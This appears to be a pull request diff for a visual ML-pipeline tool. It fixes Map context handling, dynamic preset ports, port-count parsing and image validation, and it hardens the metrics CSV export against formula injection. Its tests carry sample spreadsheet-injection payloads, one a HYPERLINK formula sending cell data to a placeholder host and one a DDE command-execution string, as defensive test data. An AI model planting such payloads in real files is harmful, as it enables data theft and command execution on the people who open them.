### PR TITLE
chore(engine,data): work the #136 review follow-ups, and drop the ones that went stale (#196, #197)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -561,12 +561,9 @@ Release candidates before 1.0.0 are on the
 [#259]: https://github.com/CodefyUI/CodefyUI/issues/259
 [#242]: https://github.com/CodefyUI/CodefyUI/issues/242
 [#265]: https://github.com/CodefyUI/CodefyUI/issues/265
-<<<<<<< HEAD
 [#196]: https://github.com/CodefyUI/CodefyUI/issues/196
 [#197]: https://github.com/CodefyUI/CodefyUI/issues/197
-=======
 [#224]: https://github.com/CodefyUI/CodefyUI/issues/224
->>>>>>> origin/main
 [@oyea0801]: https://github.com/oyea0801
 [Unreleased]: https://github.com/CodefyUI/CodefyUI/compare/2.2.0...main
 [2.2.0]: https://github.com/CodefyUI/CodefyUI/compare/2.1.1...2.2.0

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -22,7 +22,64 @@ received — each links to the release it was published as.
 
 ## [Unreleased]
 
-Nothing yet.
+### Fixed
+
+- **A `Map` body ran with no execution context, so augmentation inside one was
+  silently unseeded** ([#196]). The loop called `instance.execute(inputs,
+  params)` directly — the last node-execute call site in the repository that
+  did not go through `invoke_node` — so every node in a Map sub-graph saw
+  `context=None`. `seed_pipeline` returns the pipeline unchanged when there is
+  no context, so a seeded run's augmentation inside a Map was neither
+  reproducible nor isolated, with no error and no warning. The body also lost
+  its cancellation flag, its metric/artifact sink and its device.
+
+  The body now gets a per-node **copy** of the run's context (the rule the
+  engine has followed since [#253]), with the inner node id qualified by the
+  Map's own — `map1__node_0` — because preset internals are named `node_0`,
+  `node_1`, … and three things key off that field: the transform seed label,
+  `StatefulModuleMixin`'s weight key, and the node id on every signal. The
+  body deliberately does *not* get the Map's progress callback, which the
+  engine binds to the Map node's id.
+
+- **A preset built from a node with param-driven ports lost the extra ports**
+  ([#196]). Preset extraction and the preset registry both read the static
+  `define_inputs()` / `define_outputs()`, which answer for the *default*
+  params. A `ComposeTransform(steps=5)` therefore reported two ports however
+  many it had, so `step_3`..`step_5` never reached `exposed_inputs` and edges
+  into them had nowhere to reattach when the preset was dropped back onto a
+  canvas. `PythonScript` was affected in both directions. Both sites now use
+  the dynamic form, which the params were already in scope for.
+
+- **The metrics CSV export was open to formula injection, and unreadable in
+  Excel** ([#196]). `csv.writer` quotes commas, quotes and newlines correctly,
+  but quoting is not what stops a formula: a spreadsheet evaluates a cell
+  beginning `=`, `+`, `-`, `@`, tab or CR. Two columns are user-influenced —
+  `name`, which any plugin or custom node picks when it calls
+  `context.log_metric`, and `node_id`, straight off the graph JSON. Text cells
+  are now prefixed with an apostrophe when they lead with one of those;
+  numeric cells are untouched, so a negative value stays a number. The body
+  also gains a UTF-8 BOM: `charset=utf-8` is not enough for Excel on Windows,
+  which reads a BOM-less CSV in the ANSI codepage and mangles every non-ASCII
+  name — in a product that ships a zh-TW locale.
+
+- **`ImageFolderDataset` validated the directory tree and never a single
+  file** ([#197]). `ImageFolder` accepts anything with an image extension, so
+  a truncated, zero-byte or merely renamed `.png` built fine and then raised
+  `PIL.UnidentifiedImageError` from inside a DataLoader worker, potentially
+  minutes into training, naming nothing actionable. The node now opens an even
+  spread of at most 32 files at build time — a fixed cost that does not grow
+  with the dataset — and names the first unreadable one.
+
+- **The three port-count params disagreed with the canvas about anything with
+  a trailing character** ([#197]). `ComposeTransform`'s `steps`,
+  `PythonScript`'s `input_ports`/`output_ports` and `Split`'s `chunks` each
+  spelled their own `int(raw)`, while the canvas reads all three with
+  `parseInt(String(raw), 10)`, which takes a numeric *prefix*. So
+  `{"steps": "5.7"}` drew five handles and validated two, and an edge into
+  `step_3` was refused as an invalid input port. All three now share one
+  helper that mirrors `parseInt` — including on `"1e3"`, where the obvious
+  `int(float(raw))` fix would have traded one divergence for another. Only
+  reachable through hand-edited or externally-generated graph JSON.
 
 ## [2.2.0] — 2026-08-10
 
@@ -464,6 +521,8 @@ Release candidates before 1.0.0 are on the
 [#259]: https://github.com/CodefyUI/CodefyUI/issues/259
 [#242]: https://github.com/CodefyUI/CodefyUI/issues/242
 [#265]: https://github.com/CodefyUI/CodefyUI/issues/265
+[#196]: https://github.com/CodefyUI/CodefyUI/issues/196
+[#197]: https://github.com/CodefyUI/CodefyUI/issues/197
 [@oyea0801]: https://github.com/oyea0801
 [Unreleased]: https://github.com/CodefyUI/CodefyUI/compare/2.2.0...main
 [2.2.0]: https://github.com/CodefyUI/CodefyUI/compare/2.1.1...2.2.0

--- a/backend/app/api/routes_presets.py
+++ b/backend/app/api/routes_presets.py
@@ -114,8 +114,16 @@ async def create_preset(request: CreatePresetRequest):
         if not node_cls:
             continue
 
-        # Unconnected input ports → exposed inputs
-        for port in node_cls.define_inputs():
+        # Unconnected input ports → exposed inputs.
+        #
+        # #196: the DYNAMIC form, because the static one answers for the
+        # DEFAULT params. A ComposeTransform(steps=5) reports two ports
+        # through `define_inputs()` however many it actually has, so
+        # step_3..step_5 never reached `exposed_inputs` and the edges into
+        # them had nowhere to reattach when the preset was dropped back onto
+        # a canvas. Same for PythonScript, whose `input_ports` /
+        # `output_ports` params drive both directions.
+        for port in node_cls.define_inputs_dynamic(node["params"]):
             if (node["id"], port.name) not in connected_inputs:
                 # Build unique name: use node_id prefix if multiple nodes expose same port name
                 exposed_inputs.append({
@@ -126,8 +134,8 @@ async def create_preset(request: CreatePresetRequest):
                     "description": f"{node['type']}: {port.description}",
                 })
 
-        # Unconnected output ports → exposed outputs
-        for port in node_cls.define_outputs():
+        # Unconnected output ports → exposed outputs (see above).
+        for port in node_cls.define_outputs_dynamic(node["params"]):
             if (node["id"], port.name) not in connected_outputs:
                 exposed_outputs.append({
                     "name": f"{node['id']}_{port.name}",

--- a/backend/app/api/routes_runs.py
+++ b/backend/app/api/routes_runs.py
@@ -435,6 +435,49 @@ async def get_run_events(
     }
 
 
+#: Characters a spreadsheet reads as "this cell is a formula" when they lead
+#: the cell. Tab and CR are in here because Excel strips them first and then
+#: reads what follows, so ``\t=cmd`` is a formula wearing a disguise.
+_CSV_FORMULA_LEADERS = ("=", "+", "-", "@", "\t", "\r")
+
+#: U+FEFF, prepended to the body. ``text/csv; charset=utf-8`` is not enough
+#: for Excel on Windows, which reads a BOM-less CSV in the ANSI codepage and
+#: mangles every non-ASCII metric or node name -- in a product that ships a
+#: zh-TW locale. Every other reader (pandas, LibreOffice, Sheets, ``csv``
+#: opened as ``utf-8-sig``) skips it. Spelled ``chr`` rather than pasted:
+#: the character is invisible in an editor, which is how it gets lost.
+_CSV_BOM = chr(0xFEFF)
+
+
+def _csv_text_cell(value: Any) -> str:
+    """One TEXT cell, neutralised against formula injection.
+
+    ``csv.writer`` quotes commas, quotes and embedded newlines correctly,
+    but quoting is not what stops a formula: Excel, LibreOffice and Sheets
+    EVALUATE a cell whose first character is one of
+    :data:`_CSV_FORMULA_LEADERS`, so a metric named
+    ``=HYPERLINK("http://x/?"&A1,"loss")`` fires when the file is opened.
+
+    Two of the six columns are user-influenced. ``name`` is whatever a
+    plugin or custom node computes -- ``invoke_node`` hands any node
+    declaring ``context`` the full ``ExecutionContext``, so
+    ``context.log_metric(name, ...)`` takes an arbitrary string. ``node_id``
+    comes off the graph JSON verbatim. The shipped training nodes only ever
+    pass literals, and the canvas script namespace has no ``log_metric`` at
+    all, so plugins and custom nodes are the live route.
+
+    A leading apostrophe is the convention every spreadsheet understands as
+    "this is text". It costs one visible character in the pathological case
+    and nothing in the normal one.
+
+    Numeric columns are deliberately NOT routed through here: a negative
+    value leads with ``-`` by nature, and quoting it would turn the value
+    column into text and break every chart built on the export.
+    """
+    text = "" if value is None else str(value)
+    return f"'{text}" if text.startswith(_CSV_FORMULA_LEADERS) else text
+
+
 def _metrics_csv(run_id: str, metrics: list[MetricRecord]) -> str:
     buffer = io.StringIO(newline="")
     # Explicit lineterminator: csv defaults to \r\n, and the module's own
@@ -443,14 +486,17 @@ def _metrics_csv(run_id: str, metrics: list[MetricRecord]) -> str:
     writer.writerow(_CSV_COLUMNS)
     for point in metrics:
         writer.writerow([
-            point.run_id, point.node_id or "", point.name, point.step,
+            _csv_text_cell(point.run_id),
+            _csv_text_cell(point.node_id or ""),
+            _csv_text_cell(point.name),
+            point.step,
             # A non-finite value is stored as NULL (a diverged loss); an
             # EMPTY cell is what every spreadsheet reads as a gap, whereas
             # "None" would read as text and poison the column's type.
             "" if point.value is None else point.value,
             point.ts,
         ])
-    return buffer.getvalue()
+    return _CSV_BOM + buffer.getvalue()
 
 
 def _csv_filename(run_id: str) -> str:

--- a/backend/app/core/node_base.py
+++ b/backend/app/core/node_base.py
@@ -1,5 +1,7 @@
 from __future__ import annotations
 
+import math
+import re
 from abc import ABC, abstractmethod
 from dataclasses import dataclass, field
 from enum import Enum
@@ -153,6 +155,59 @@ def is_param_visible(
         if not any(str(candidate) == actual for candidate in accepted):
             return False
     return True
+
+
+#: JS ``parseInt``'s numeric prefix: optional whitespace, optional sign,
+#: then ASCII digits, and whatever follows is ignored. ``[0-9]`` rather than
+#: ``\d``, which in Python also matches Devanagari and other Unicode digits
+#: that ``parseInt`` rejects.
+_LEADING_INT = re.compile(r"\s*([+-]?[0-9]+)")
+
+
+def resolve_count_param(
+    params: dict[str, Any] | None,
+    name: str,
+    *,
+    default: int,
+    minimum: int,
+    maximum: int,
+) -> int:
+    """A port-count param, clamped. The backend twin of ``clampCount``.
+
+    ONE convention for every param that decides how many ports a node has --
+    ``ComposeTransform``'s ``steps``, ``PythonScript``'s ``input_ports`` /
+    ``output_ports``, ``Split``'s ``chunks``. Each used to spell its own
+    ``int(raw)``, and each therefore disagreed with the canvas in the same
+    way: the frontend reads these with ``parseInt(String(raw), 10)``, which
+    takes a NUMERIC PREFIX, while ``int()`` demands the whole string. So
+    ``{"steps": "5.7"}`` drew five handles and validated two, and
+    ``{"steps": "6 chains"}`` drew six and validated two -- the canvas
+    offering ports the engine then rejected as invalid input ports.
+
+    Only reachable through hand-edited or externally-generated graph JSON;
+    the INT widget cannot produce any of these. Clamps rather than raises,
+    because the callers are the palette, the validator and the renderer,
+    none of which has anywhere to put an exception.
+
+    Deliberately NOT ``int(float(raw))``, which was the obvious fix and is
+    the wrong one: it agrees on ``"5.7"`` but then reads ``"1e3"`` as 1000
+    where ``parseInt("1e3", 10)`` is 1, trading one divergence for another.
+
+    Booleans go to *default* -- ``String(true)`` is ``"true"``, which
+    ``parseInt`` rejects -- rather than to Python's ``int(True) == 1``.
+    """
+    raw = (params or {}).get(name, default)
+    parsed: int | None
+    if isinstance(raw, bool):
+        parsed = None
+    elif isinstance(raw, (int, float)):
+        parsed = math.floor(raw) if math.isfinite(raw) else None
+    else:
+        match = _LEADING_INT.match("" if raw is None else str(raw))
+        parsed = int(match.group(1)) if match else None
+    if parsed is None:
+        parsed = default
+    return max(minimum, min(maximum, parsed))
 
 
 class BaseNode(ABC):

--- a/backend/app/core/preset_registry.py
+++ b/backend/app/core/preset_registry.py
@@ -114,7 +114,15 @@ class PresetRegistry:
         cls = node_registry.get(node.type)
         if not cls:
             return "ANY"
-        ports = cls.define_inputs() if direction == "input" else cls.define_outputs()
+        # #196: the DYNAMIC form. `InternalNodeSchema` carries the stored
+        # params, so a port that only exists at this instance's port count
+        # (ComposeTransform's step_3.., PythonScript's in3../out3..) resolves
+        # to its real data type instead of silently falling through to "ANY"
+        # and colouring the preset's handle grey.
+        ports = (
+            cls.define_inputs_dynamic(node.params) if direction == "input"
+            else cls.define_outputs_dynamic(node.params)
+        )
         port = next((p for p in ports if p.name == port_name), None)
         return port.data_type.value if port else "ANY"
 

--- a/backend/app/nodes/data/image_folder_dataset_node.py
+++ b/backend/app/nodes/data/image_folder_dataset_node.py
@@ -207,7 +207,60 @@ class ImageFolderDatasetNode(BaseNode):
         dataset = ImageFolder(str(root),
                               transform=seeded_for_node(transform, context))
 
+        _verify_sample_images(dataset.samples)
+
         return {"dataset": dataset, "classes": list(dataset.classes)}
+
+
+#: How many images :func:`_verify_sample_images` opens. Enough to catch a
+#: truncated export or a folder of renamed files -- the two ways this goes
+#: wrong in practice, both of which affect many files, not one -- while
+#: staying a fixed cost that does not grow with the dataset.
+VERIFY_SAMPLE_SIZE = 32
+
+
+def _verify_sample_images(samples: list[tuple[str, int]]) -> None:
+    """Open a spread sample of *samples*, raising on the first unreadable one.
+
+    The node checks the directory tree carefully and, until #197, never
+    checked a single file. ``ImageFolder`` accepts anything with a listed
+    extension, so a truncated, zero-byte or merely renamed ``.png`` builds
+    fine here and raises ``PIL.UnidentifiedImageError`` from inside a
+    DataLoader WORKER, potentially minutes into training, naming nothing
+    the user can act on -- the exact class of error the node's other
+    messages go out of their way to avoid.
+
+    An EVEN spread from the first file to the last, not the first N:
+    ``samples`` is ordered by class, so the first N would only ever inspect
+    the alphabetically first class and a dataset whose last class is the
+    broken one would sail through. A sample rather than everything: full
+    validation would read the whole dataset at build time, which is the cost
+    this node exists to defer.
+
+    ``verify()`` and not ``load()``: it reads structure (a PNG's chunk CRCs,
+    a JPEG's markers) without decoding pixels, which is what makes 32 files
+    free. It also invalidates the handle, hence the fresh ``open`` per file.
+    """
+    from PIL import Image
+
+    if not samples:
+        return
+    count = min(VERIFY_SAMPLE_SIZE, len(samples))
+    last = len(samples) - 1
+    indices = sorted({i * last // max(1, count - 1) for i in range(count)})
+    for path, _label in (samples[i] for i in indices):
+        try:
+            with Image.open(path) as image:
+                image.verify()
+        except Exception as exc:  # noqa: BLE001 - re-raised with the path
+            raise ValueError(
+                f"'{path}' is not a readable image ({type(exc).__name__}: "
+                f"{exc}). ImageFolder takes any file with an image "
+                f"extension, so a truncated download, a zero-byte file or "
+                f"something renamed to .png gets this far and then fails "
+                f"inside a data-loading worker mid-training. Remove or "
+                f"re-export the file and run again."
+            ) from exc
 
 
 def _missing_root_message(base: Path, root: Path, split: str) -> str:

--- a/backend/app/nodes/data/transforms/compose_transform_node.py
+++ b/backend/app/nodes/data/transforms/compose_transform_node.py
@@ -9,6 +9,7 @@ from ....core.node_base import (
     ParamDefinition,
     ParamType,
     PortDefinition,
+    resolve_count_param,
 )
 from ._base import CHAIN_OUTPUT_DESC, TransformStepNode, compose
 
@@ -24,13 +25,13 @@ def _step_count(params: dict[str, Any] | None) -> int:
 
     Called by the palette, the validator and the renderer with whatever the
     graph JSON happens to hold, which after a hand edit is not necessarily
-    an integer at all.
+    an integer at all. :func:`resolve_count_param` is the one convention
+    every port-count param shares, and the one the canvas mirrors (#197).
     """
-    try:
-        count = int((params or {}).get("steps", DEFAULT_STEPS))
-    except (TypeError, ValueError):
-        return DEFAULT_STEPS
-    return max(MIN_STEPS, min(MAX_STEPS, count))
+    return resolve_count_param(
+        params, "steps",
+        default=DEFAULT_STEPS, minimum=MIN_STEPS, maximum=MAX_STEPS,
+    )
 
 
 class ComposeTransformNode(TransformStepNode):

--- a/backend/app/nodes/dataflow/map_node.py
+++ b/backend/app/nodes/dataflow/map_node.py
@@ -1,5 +1,6 @@
 from __future__ import annotations
 
+import copy
 import logging
 from collections import defaultdict
 from typing import Any
@@ -49,7 +50,7 @@ class MapNode(BaseNode):
         *,
         context: Any = None,
     ) -> dict[str, Any]:
-        from ...core.graph_engine import topological_sort
+        from ...core.graph_engine import invoke_node, topological_sort
         from ...core.loop_control import (
             EVENT_BATCH,
             ProgressThrottle,
@@ -108,6 +109,12 @@ class MapNode(BaseNode):
         throttle = ProgressThrottle(progress_callback)
         stopped_at_item: int | None = None
 
+        # The Map's own id, as the engine stamped it on this context. Used
+        # to qualify the body's node ids below; "map" only when Map is being
+        # driven by something that keeps no per-node identity (a bare
+        # ``execute`` in a test).
+        outer_node_id = getattr(context, "current_node_id", "") or "map"
+
         results = []
         for i, item in enumerate(items):
             if should_stop():
@@ -130,7 +137,54 @@ class MapNode(BaseNode):
                     node_inputs[in_port.internal_port] = item
 
                 instance = node_cls()
-                result = instance.execute(node_inputs, node_def.get("data", {}).get("params", {}))
+
+                # #196: the body used to run on ``context=None`` -- the last
+                # node-execute call site in the repo that did not go through
+                # ``invoke_node``. It cost every inner node its seed stream
+                # (``seed_pipeline`` hands back the raw pipeline when there
+                # is no context, so augmentation inside a Map was neither
+                # reproducible nor isolated, with no error and no warning),
+                # its cancellation flag, its metric/artifact sink and its
+                # device.
+                #
+                # A per-inner-node COPY, never the shared object: the same
+                # rule ``graph_engine`` follows since #253. Every
+                # collaborator on the context -- the stop event, the outbox,
+                # ``node_state_store`` -- stays the SAME object; only the
+                # scalar id differs. It also means the caller's
+                # ``current_node_id`` is untouched, so there is nothing to
+                # restore after the loop.
+                #
+                # The id is QUALIFIED with the Map's own, using the ``a__b``
+                # separator preset expansion already uses
+                # (``graph_engine._expand_preset``). Preset internals are
+                # named ``node_0``, ``node_1``, ... so a bare inner id is
+                # unique only within one body, and three things key off this
+                # field: ``seeded_for_node``'s ``transform:<id>`` seed label
+                # (two transform nodes in one body must draw different
+                # streams), ``StatefulModuleMixin``'s ``(graph_id,
+                # current_node_id, structure_hash)`` (two same-shaped
+                # stateful nodes must not share weights -- across two Map
+                # instances as well as within one body), and the node id on
+                # every metric/warning/artifact the body emits.
+                node_context = context
+                if context is not None:
+                    node_context = copy.copy(context)
+                    node_context.current_node_id = f"{outer_node_id}__{node_id}"
+
+                result = invoke_node(
+                    instance,
+                    node_inputs,
+                    node_def.get("data", {}).get("params", {}),
+                    # Deliberately NOT the Map's own callback. The engine
+                    # binds that to the MAP node's id, so an inner training
+                    # loop's per-batch frames would arrive on the canvas as
+                    # the Map node's progress and race the per-item frames
+                    # emitted below. The body gets the context (state) but
+                    # not the outer node's progress channel (presentation).
+                    progress_callback=None,
+                    context=node_context,
+                )
                 node_outputs[node_id] = result
 
             out = node_outputs.get(out_port.internal_node, {}).get(out_port.internal_port)

--- a/backend/app/nodes/tensor_ops/split_node.py
+++ b/backend/app/nodes/tensor_ops/split_node.py
@@ -1,17 +1,29 @@
 from typing import Any
 
-from ...core.node_base import BaseNode, DataType, ParamDefinition, ParamType, PortDefinition
+from ...core.node_base import (
+    BaseNode,
+    DataType,
+    ParamDefinition,
+    ParamType,
+    PortDefinition,
+    resolve_count_param,
+)
 
 MAX_CHUNKS = 32
 
 
 def _resolve_chunks(params: dict[str, Any] | None) -> int:
-    raw = (params or {}).get("chunks", 2)
-    try:
-        n = int(raw)
-    except (TypeError, ValueError):
-        n = 2
-    return max(1, min(MAX_CHUNKS, n))
+    """How many ``chunk_i`` outputs this instance has.
+
+    Shares :func:`resolve_count_param` with ``ComposeTransform`` and
+    ``PythonScript``: three port-count params spelling their own ``int()``
+    is how the backend and the canvas came to disagree in the first place
+    (#197), so tightening two of the three would just have left a third
+    convention behind.
+    """
+    return resolve_count_param(
+        params, "chunks", default=2, minimum=1, maximum=MAX_CHUNKS,
+    )
 
 
 class SplitNode(BaseNode):

--- a/backend/app/nodes/utility/python_script_node.py
+++ b/backend/app/nodes/utility/python_script_node.py
@@ -70,6 +70,7 @@ from ...core.node_base import (
     ParamDefinition,
     ParamType,
     PortDefinition,
+    resolve_count_param,
 )
 from ...core.script_policy import (
     ESCAPE_HATCH_HINT,
@@ -160,13 +161,15 @@ def _script_builtins_base() -> dict[str, Any]:
 
 
 def resolve_port_count(params: dict[str, Any] | None, name: str) -> int:
-    """Clamp a port-count param into ``1..MAX_PORTS``, tolerating garbage."""
-    raw = (params or {}).get(name, 1)
-    try:
-        count = int(raw)
-    except (TypeError, ValueError):
-        count = 1
-    return max(1, min(MAX_PORTS, count))
+    """Clamp a port-count param into ``1..MAX_PORTS``, tolerating garbage.
+
+    Shares :func:`resolve_count_param` with ``ComposeTransform`` and
+    ``Split`` so the three stay ONE convention, and the one the canvas
+    mirrors (#197).
+    """
+    return resolve_count_param(
+        params, name, default=1, minimum=1, maximum=MAX_PORTS,
+    )
 
 
 def resolve_port_types(

--- a/backend/tests/test_api_presets.py
+++ b/backend/tests/test_api_presets.py
@@ -177,3 +177,93 @@ async def test_create_still_accepts_a_canvas_with_no_instances(
         "edges": [],
     })
     assert resp.status_code == 200, resp.text
+
+
+# -- dynamic port counts survive preset extraction (#196) -----------------
+#
+# Both loops used to read the STATIC define_inputs() / define_outputs(),
+# which answer for the DEFAULT params. A ComposeTransform(steps=5) therefore
+# reported two ports however many it had, and step_3..step_5 never reached
+# `exposed_inputs` -- so edges into them had nowhere to reattach when the
+# preset was dropped back onto a canvas.
+
+
+@pytest.mark.asyncio
+async def test_preset_exposes_every_port_a_dynamic_node_actually_has(
+    test_client, _isolated_presets,
+):
+    resp = await test_client.post("/api/presets/create", json={
+        "name": "Five Steps",
+        "nodes": [
+            {"id": "cmp", "type": "ComposeTransform",
+             "data": {"params": {"steps": 5}}},
+        ],
+        "edges": [],
+    })
+    assert resp.status_code == 200, resp.text
+
+    exposed = {p["internal_port"] for p in resp.json()["exposed_inputs"]}
+    assert exposed == {f"step_{i}" for i in range(1, 6)}
+
+
+@pytest.mark.asyncio
+async def test_preset_exposes_dynamic_ports_in_both_directions(
+    test_client, _isolated_presets,
+):
+    """PythonScript varies inputs AND outputs, so it catches a fix applied to
+    only one of the two loops."""
+    resp = await test_client.post("/api/presets/create", json={
+        "name": "Wide Script",
+        "nodes": [
+            {"id": "py", "type": "PythonScript",
+             "data": {"params": {"input_ports": 4, "output_ports": 3,
+                                 "code": "return {}"}}},
+        ],
+        "edges": [],
+    })
+    assert resp.status_code == 200, resp.text
+
+    body = resp.json()
+    assert {p["internal_port"] for p in body["exposed_inputs"]} == {
+        f"in{i}" for i in range(1, 5)}
+    assert {p["internal_port"] for p in body["exposed_outputs"]} == {
+        f"out{i}" for i in range(1, 4)}
+
+
+@pytest.mark.asyncio
+async def test_preset_still_exposes_the_default_ports_of_a_static_node(
+    test_client, _isolated_presets,
+):
+    """The dynamic form delegates to the static one for everything else, so
+    a node holding no port param must be completely unaffected."""
+    resp = await test_client.post("/api/presets/create", json={
+        "name": "Static",
+        "nodes": [
+            {"id": "cmp", "type": "ComposeTransform", "data": {"params": {}}},
+        ],
+        "edges": [],
+    })
+    assert resp.status_code == 200, resp.text
+    assert {p["internal_port"] for p in resp.json()["exposed_inputs"]} == {
+        "step_1", "step_2"}
+
+
+def test_registry_types_a_port_that_only_exists_at_this_port_count():
+    """``_resolve_port_type`` read the same static definition, so a stored
+    preset naming step_5 resolved to "ANY" and the canvas drew a grey handle
+    where the wire is a TRANSFORM."""
+    from app.core.node_registry import registry as node_registry
+
+    preset = preset_registry._load_and_resolve({
+        "preset_name": "Five Steps",
+        "nodes": [{"id": "cmp", "type": "ComposeTransform",
+                   "params": {"steps": 5}}],
+        "edges": [],
+        # data_type omitted on purpose: that is what makes the registry
+        # resolve it from the node class.
+        "exposed_inputs": [{"name": "s5", "internal_node": "cmp",
+                            "internal_port": "step_5"}],
+        "exposed_outputs": [],
+    }, node_registry)
+
+    assert preset.exposed_inputs[0].data_type == "TRANSFORM"

--- a/backend/tests/test_api_runs.py
+++ b/backend/tests/test_api_runs.py
@@ -26,6 +26,7 @@ from typing import Any
 import pytest
 from httpx import ASGITransport, AsyncClient
 
+from app.api.routes_runs import _CSV_BOM, _metrics_csv
 from app.config import settings
 from app.core.auth import TOKEN_HEADER, session_token
 from app.core.db import Database
@@ -40,7 +41,7 @@ from app.core.node_base import (
 from app.core.node_registry import registry
 from app.core.run_output_store import RunOutputStore
 from app.core.run_service import QueueLimits, RunService
-from app.core.run_store import RunProvenance, RunStore
+from app.core.run_store import MetricRecord, RunProvenance, RunStore
 from app.main import app
 
 BASE_URL = f"http://127.0.0.1:{settings.PORT}"
@@ -713,7 +714,10 @@ async def test_metrics_csv_export(client):
     assert response.headers["content-type"].startswith("text/csv")
     assert run_id in response.headers["content-disposition"]
 
-    rows = list(csv.reader(io.StringIO(response.text)))
+    # The body leads with a UTF-8 BOM (see _CSV_BOM), which every reader
+    # skips when told the encoding -- hence utf-8-sig here and below.
+    text = response.content.decode("utf-8-sig")
+    rows = list(csv.reader(io.StringIO(text)))
     assert rows[0] == ["run_id", "node_id", "name", "step", "value", "ts"]
     assert len(rows) == 3
     assert [row[2] for row in rows[1:]] == ["loss", "loss"]
@@ -750,9 +754,83 @@ async def test_metrics_csv_for_a_run_with_no_series_is_header_only(client):
     response = await client.get(f"/api/runs/{run_id}/metrics?format=csv")
     assert response.status_code == 200
     assert response.headers["content-type"].startswith("text/csv")
-    assert response.text == "run_id,node_id,name,step,value,ts\n"
-    rows = list(csv.reader(io.StringIO(response.text)))
+    assert response.content == b"\xef\xbb\xbfrun_id,node_id,name,step,value,ts\n"
+    text = response.content.decode("utf-8-sig")
+    rows = list(csv.reader(io.StringIO(text)))
     assert rows == [list(("run_id", "node_id", "name", "step", "value", "ts"))]
+
+
+async def test_metrics_csv_leads_with_a_utf8_bom(client):
+    """``text/csv; charset=utf-8`` is not enough for Excel on Windows, which
+    reads a BOM-less CSV in the ANSI codepage and mangles every non-ASCII
+    metric or node name -- in a product that ships a zh-TW locale."""
+    run_id = (await client.post("/api/runs",
+                                json={"graph": _graph()})).json()["run_id"]
+    await _poll_until_terminal(client, run_id)
+
+    response = await client.get(f"/api/runs/{run_id}/metrics?format=csv")
+    assert response.content.startswith(b"\xef\xbb\xbf")
+
+
+# ── CSV formula injection (#196) ──────────────────────────────────────────
+#
+# csv.writer quotes commas, quotes and newlines correctly, but quoting is
+# not what stops a formula: a spreadsheet EVALUATES a cell whose first
+# character is one of = + - @ tab CR. Two of the six columns are
+# user-influenced -- `name`, which any plugin or custom node picks when it
+# calls context.log_metric, and `node_id`, which comes off the graph JSON.
+
+
+def _one_metric(**overrides):
+    fields = {"run_id": "r1", "node_id": "n1", "name": "loss", "step": 1,
+              "value": 0.5, "ts": "2026-01-01T00:00:00Z"}
+    fields.update(overrides)
+    return MetricRecord(**fields)
+
+
+def _csv_rows(*metrics):
+    body = _metrics_csv("r1", list(metrics))
+    assert body.startswith(_CSV_BOM)
+    return list(csv.reader(io.StringIO(body[len(_CSV_BOM):])))
+
+
+@pytest.mark.parametrize("leader", ["=", "+", "-", "@", "\t", "\r"])
+def test_a_hostile_metric_name_is_not_a_formula(leader):
+    payload = f'{leader}HYPERLINK("http://x/?"&A1,"loss")'
+    rows = _csv_rows(_one_metric(name=payload))
+    assert rows[1][2] == f"'{payload}"
+
+
+def test_a_hostile_node_id_is_not_a_formula():
+    """node_id is emitted verbatim from the graph JSON."""
+    rows = _csv_rows(_one_metric(node_id="=cmd|'/c calc'!A1"))
+    assert rows[1][1] == "'=cmd|'/c calc'!A1"
+
+
+def test_an_ordinary_name_is_not_touched():
+    """The apostrophe must not show up on every row of every export."""
+    rows = _csv_rows(_one_metric(name="val_accuracy", node_id="train-1"))
+    assert rows[1][1:3] == ["train-1", "val_accuracy"]
+
+
+def test_a_negative_value_stays_a_number():
+    """The value column leads with '-' by nature. Quoting it would turn the
+    column into text and break every chart built on the export."""
+    rows = _csv_rows(_one_metric(value=-0.25))
+    assert rows[1][4] == "-0.25"
+    assert float(rows[1][4]) == -0.25
+
+
+def test_a_null_value_is_still_an_empty_cell():
+    """A diverged loss is stored as NULL; the gap must survive the escaping."""
+    rows = _csv_rows(_one_metric(value=None))
+    assert rows[1][4] == ""
+
+
+def test_commas_and_newlines_are_still_quoted_not_escaped():
+    """The neutralisation must not have replaced csv.writer's own quoting."""
+    rows = _csv_rows(_one_metric(name="a,b\nc"))
+    assert rows[1][2] == "a,b\nc"
 
 
 async def test_metrics_reject_an_unknown_format(client):

--- a/backend/tests/test_image_folder_dataset_node.py
+++ b/backend/tests/test_image_folder_dataset_node.py
@@ -320,3 +320,79 @@ def test_a_directory_with_no_class_folders_says_so(tmp_path: Path):
     _write_images(root / "train", 2)  # images, but no class level
     with pytest.raises(ValueError, match="no sub-directories"):
         _run({"path": str(root), "split": "train"})
+
+
+# ── the FILES, not only the tree (#197) ──────────────────────────────────
+#
+# The node validated the directory tree carefully and never opened a single
+# file. ImageFolder accepts anything with a listed extension, so a
+# truncated, zero-byte or merely renamed .png built fine and then raised
+# PIL.UnidentifiedImageError from inside a DataLoader worker, potentially
+# minutes into training, naming nothing the user could act on.
+
+
+def test_a_zero_byte_image_is_named_at_build_time(tree: Path):
+    (tree / "train" / "cat" / "broken.png").write_bytes(b"")
+    with pytest.raises(ValueError) as excinfo:
+        _run({"path": str(tree), "split": "train"})
+    assert "broken.png" in str(excinfo.value)
+
+
+def test_a_renamed_non_image_is_named_at_build_time(tree: Path):
+    (tree / "train" / "dog" / "notes.png").write_text("this is not a png")
+    with pytest.raises(ValueError) as excinfo:
+        _run({"path": str(tree), "split": "train"})
+    assert "notes.png" in str(excinfo.value)
+
+
+def test_a_truncated_image_is_named_at_build_time(tree: Path):
+    """The one PIL's ``open`` alone would miss: the header parses, so only
+    ``verify()`` (chunk CRCs / markers) catches it."""
+    good = tree / "train" / "cat" / "0.png"
+    truncated = tree / "train" / "cat" / "cut.png"
+    truncated.write_bytes(good.read_bytes()[:-40])
+    with pytest.raises(ValueError) as excinfo:
+        _run({"path": str(tree), "split": "train"})
+    assert "cut.png" in str(excinfo.value)
+
+
+def test_a_healthy_tree_is_not_rejected(tree: Path):
+    """The check must not have made an ordinary dataset unloadable."""
+    assert len(_run({"path": str(tree), "split": "train"})["dataset"]) == 5
+
+
+def test_the_check_spreads_across_classes_rather_than_taking_the_first_n(
+    monkeypatch, tmp_path: Path,
+):
+    """``samples`` is ordered by class, so a first-N sample would only ever
+    inspect the alphabetically first one and miss every later class."""
+    from app.nodes.data import image_folder_dataset_node as node_module
+
+    monkeypatch.setattr(node_module, "VERIFY_SAMPLE_SIZE", 4)
+    root = tmp_path / "wide"
+    _write_images(root / "aaa", 20)
+    _write_images(root / "zzz", 20)
